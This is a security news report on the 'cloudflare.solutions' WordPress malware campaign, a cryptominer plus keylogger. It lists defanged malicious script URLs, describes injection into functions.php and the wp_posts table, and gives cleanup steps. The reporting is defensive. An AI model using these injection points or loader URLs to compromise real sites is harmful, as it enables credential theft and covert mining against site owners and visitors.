At least 2,000 WordPress websites have been compromised by a piece of malware designed to act like a cryptocurrency miner and a keystroke logger. The malware leverages the name of Cloudfare and was discovered several months ago by Sucuri researchers.
The “cloudflare.solutions” Malware Once Again Detected in Campaigns
A few months ago the Sucuri team came across two injections from the so-called “cloudflare.solutions” malware: a CoinHive cryptominer concealed within fake Google Analytics and jQuery, and the WordPress keylogger from Cloudflare[.]solutions. The malware was identified in April 2017. An evolved version of it has spread to new domains, the research reveals.
This is what has happened so far:
A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflare[.]solutions domain was taken down. This was not the end of the malware campaign, however; attackers immediately registered a number of new domains including cdjs[.]online on Dec 8th, cdns[.]ws on Dec 9th, and msdns[.]online on Dec 16th.
According to the researchers, the hackers behind these malware campaigns are the same ones that successfully compromised nearly 5,500 WordPress websites. Both campaigns employ the same malware that was described in the beginning – the so-called “cloudflare.solutions” malware. However, a keylogger was recently added to the malware functionalities and now admin credentials are at risk – the malware can harvest the admin’s login page and the website’s public facing front-end.
Researchers were able to identify several injected scrips used in the attack in the past month:
hxxps://cdjs[.]online/lib.js
hxxps://cdjs[.]online/lib.js?ver=…
hxxps://cdns[.]ws/lib/googleanalytics.js?ver=…
hxxps://msdns[.]online/lib/mnngldr.js?ver=…
hxxps://msdns[.]online/lib/klldr.js
The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme’s functions.php file, just like in the previous cloudflare[.]solutions attack, the report says.
Similarly to the previous campaign, a fake gogleanalytics.js loading an obfuscated script was also discovered.
As for the mining part of the “cloudflare.solutions” malware, the researchers found that the library jquery-3.2.1.min.js is similar to the encrypted CoinHive cryptomining library from the previous version, which was loaded from hxxp:// 3117488091/lib/jquery-3.2.1.min.js?v=3.2.11.
How to Clean an Infected Website
Even though these new attacks are not as extensive as the initial Cloudflare[.]solutions campaign, the fact that the malware is once again infecting WordPress means that there are still admins that have failed to properly protect their websites. Researchers even believe that some of the re-infected websites didn’t even notice the original infection.
Finally, if you have noticed that your website has been compromised by the Cloudflare[.]solutions malware, this is what you need to do: remove the malicious code from your theme’s functions.php, scan wp_posts table for possible injections, change all WordPress passwords and, lastly, update all server software including third-party themes and plugins.